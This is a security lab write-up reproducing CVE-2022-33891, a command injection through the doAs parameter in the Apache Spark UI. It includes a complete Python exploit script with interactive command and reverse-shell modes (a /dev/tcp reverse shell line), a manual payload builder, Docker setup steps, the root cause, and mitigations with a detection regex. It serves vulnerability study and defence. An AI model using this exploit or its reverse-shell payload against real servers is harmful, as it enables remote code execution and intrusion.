CVE-2022-33891 Apache Spark shell command injection vulnerability reproduction
2022-07-26 14:59:00 【Hetian network security laboratory】
Brief introduction
Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Scala, Java, Python and R, and an optimized engine that supports general computation graphs for data analysis. It also supports a rich set of higher-level tools, including Spark SQL for SQL and DataFrames, the Pandas API on Spark for Pandas workloads, MLlib for machine learning, GraphX for graph processing, and Structured Streaming for stream processing.
Affected versions
Apache Spark <= 3.0.3
3.1.1 <= Apache Spark <= 3.1.2
3.2.0 <= Apache Spark <= 3.2.1
Environment setup
At present, a Docker image for the old (vulnerable) version cannot be found on the official site.

Searching for the old version also turns up nothing.
The environment here is built from an image in a personal repository on GitHub. Download address:
https://github.com/big-data-europe/docker-spark
The configuration needs to be modified to get a vulnerable version: download the repo and edit the Dockerfile, setting the Spark version to 3.1.1.

After revising the version, start the environment:
docker-compose up -d

Visit:
http://10.10.10.32:8080

The vulnerability could not be triggered in this test; the configuration file needs to be modified to enable ACLs:
echo "spark.acls.enable true" >> conf/spark-defaults.conf
The POC is as follows:
#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime

parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
args = parser.parse_args()

full_url = f"{args.url}:{args.port}"


def check_for_vuln(url):
    print("[*] Attempting to connect to site...")
    r = requests.get(f"{full_url}/?doAs='testing'", allow_redirects=False)
    if r.status_code != 403:
        print("[-] Does not look like an Apache Spark server.")
        quit(1)
    elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
        print("[-] Does not look like an Apache Spark server.")
        quit(1)
    else:
        print("[*] Performing sleep test of 10 seconds...")
        t1 = datetime.datetime.now()
        run_cmd("sleep 10")
        t2 = datetime.datetime.now()
        delta = t2 - t1
        if delta.seconds < 10:
            print("[-] Sleep was less than 10. This target is probably not vulnerable")
        else:
            print("[+] Sleep was 10 seconds! This target is probably vulnerable!")
    exit(0)


def cmd_prompt():
    # Provide user with cmd prompt on loop to run commands
    cmd = input("> ")
    return cmd


def base64_encode(cmd):
    message_bytes = cmd.encode('ascii')
    base64_bytes = base64.b64encode(message_bytes)
    base64_cmd = base64_bytes.decode('ascii')
    return base64_cmd


def run_cmd(cmd):
    try:
        # Execute given command from cmd prompt
        # print("[*] Command is: " + cmd)
        base64_cmd = base64_encode(cmd)
        # print("[*] Base64 command is: " + base64_cmd)
        exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
        exploit_req = f"{full_url}{exploit}"
        print("[*] Full exploit request is: " + exploit_req)
        requests.get(exploit_req, allow_redirects=False)
    except Exception as e:
        print(str(e))


def revshell(lhost, lport):
    print(f"[*] Reverse shell mode.\n[*] Set up your listener by entering the following:\n nc -nvlp {lport}")
    input("[!] When your listener is set up, press enter!")
    rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    run_cmd(rev_shell_cmd)


def main():
    if args.check and args.revshell:
        print("[!] Please choose either revshell or check!")
        exit(1)
    elif args.check:
        check_for_vuln(full_url)
    # Revshell
    elif args.revshell:
        if not (args.listeninghost and args.listeningport):
            print("[x] You need a listeninghost and listening port!")
            exit(1)
        else:
            lhost = args.listeninghost
            lport = args.listeningport
            revshell(lhost, lport)
    else:
        # "Interactive" mode
        print("[*] \"Interactive\" mode!\n[!] Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
        while True:
            command_to_run = cmd_prompt()
            run_cmd(command_to_run)


if __name__ == "__main__":
    main()

If it fails, rebuild the project and start Docker with the following file. The problem may be with the image: Apache Spark is configured differently in different repositories. This one uses version 3.0.0:
version: '2'
services:
  spark:
    image: docker.io/bitnami/spark:3.0.0
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'
Visit the web UI.

Modify the configuration file
docker exec -it 8a /bin/bash
I have no name!@8a…:/opt/bitnami/spark$ echo "spark.acls.enable true" >> conf/spark-defaults.conf
I have no name!@8a…:/opt/bitnami/spark$ cat conf/spark-defaults.conf

The configuration has been appended; restart Docker:
root@…:/home/ubuntu/Desktop/spark# docker-compose up -d

Use the POC to generate the payload, or construct it manually; note that the command to execute only takes effect when it is base64-encoded and then wrapped in an echo that decodes and executes it.
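For reference, here is a minimal sketch of building the payload manually, mirroring the run_cmd logic of the POC above (the target address reuses the lab IP from this article, and the command touch /tmp/pwned is only a placeholder; adjust both for your environment):

#!/usr/bin/env python3
# Minimal sketch of manual payload construction for CVE-2022-33891.
# Assumptions: target and command below are placeholders for a lab setup.
import base64
import requests

target = "http://192.168.0.112:8080"   # vulnerable Spark UI (lab address used in this article)
command = "touch /tmp/pwned"           # command to execute on the target

# Base64-encode the command so special characters survive the URL / shell boundary
b64 = base64.b64encode(command.encode()).decode()

# The doAs parameter is injected into a shell command on the server side
url = f"{target}/?doAs=`echo {b64} | base64 -d | bash`"
print("[*] Requesting:", url)
requests.get(url, allow_redirects=False)   # no output is returned; verify on the target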

Since the command output is not echoed back, get a reverse shell directly:
python 2.py -u http://192.168.0.112 -p 8080 --revshell -lh 192.168.0.121 -lp 4444

Check the connection status:

Cause of the vulnerability
The vulnerability stems from the configuration option spark.acls.enable, which the Apache Spark UI provides to enable ACLs. With ACLs enabled, an authentication filter checks whether a user has permission to view or modify the application. In that case, a code path in HttpSecurityFilter allows impersonation by supplying an arbitrary user name. A malicious user can then reach the permission-check function, which ultimately builds and executes a Unix shell command containing that user name, leading to arbitrary shell command execution.
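To make the unsafe pattern concrete, below is a simplified Python sketch, not Spark's actual Scala code; it only illustrates how an attacker-controlled doAs value that reaches a shell command via string interpolation leads to command injection (the id -Gn lookup stands in for Spark's group lookup, which shells out in a similar way):

import subprocess

def get_user_groups(username: str) -> str:
    # Simplified illustration of the flaw: the user-supplied name is interpolated
    # into a shell command. With shell=True, backticks or $() in `username`
    # are expanded and executed by the shell before id runs.
    return subprocess.run(f"id -Gn {username}", shell=True,
                          capture_output=True, text=True).stdout

# An attacker-controlled doAs value such as the one below injects a command:
get_user_groups("`touch /tmp/pwned`")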
Reference: Security | Apache Spark (https://spark.apache.org/security.html)
Remediation suggestions
1. Upgrade to a patched version; refer to the official download page: Downloads | Apache Spark (https://spark.apache.org/downloads.html)
2. Add a blacklist or WAF rules as a temporary mitigation (see the sketch below).
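As a rough example of such a temporary rule, the following minimal Python sketch flags requests whose doAs parameter contains shell metacharacters; it is an assumed detection heuristic for illustration, not a ready-made WAF configuration:

import re
from urllib.parse import urlparse, parse_qs

# Flag doAs values containing shell metacharacters (backticks, $, pipes, semicolons, &)
SUSPICIOUS = re.compile(r"[`$|;&]")

def looks_malicious(request_url: str) -> bool:
    params = parse_qs(urlparse(request_url).query)
    return any(SUSPICIOUS.search(v) for v in params.get("doAs", []))

print(looks_malicious("http://10.10.10.32:8080/?doAs=`echo dG91Y2ggL3RtcC9wd25lZA== | base64 -d | bash`"))  # True
print(looks_malicious("http://10.10.10.32:8080/?doAs=alice"))  # False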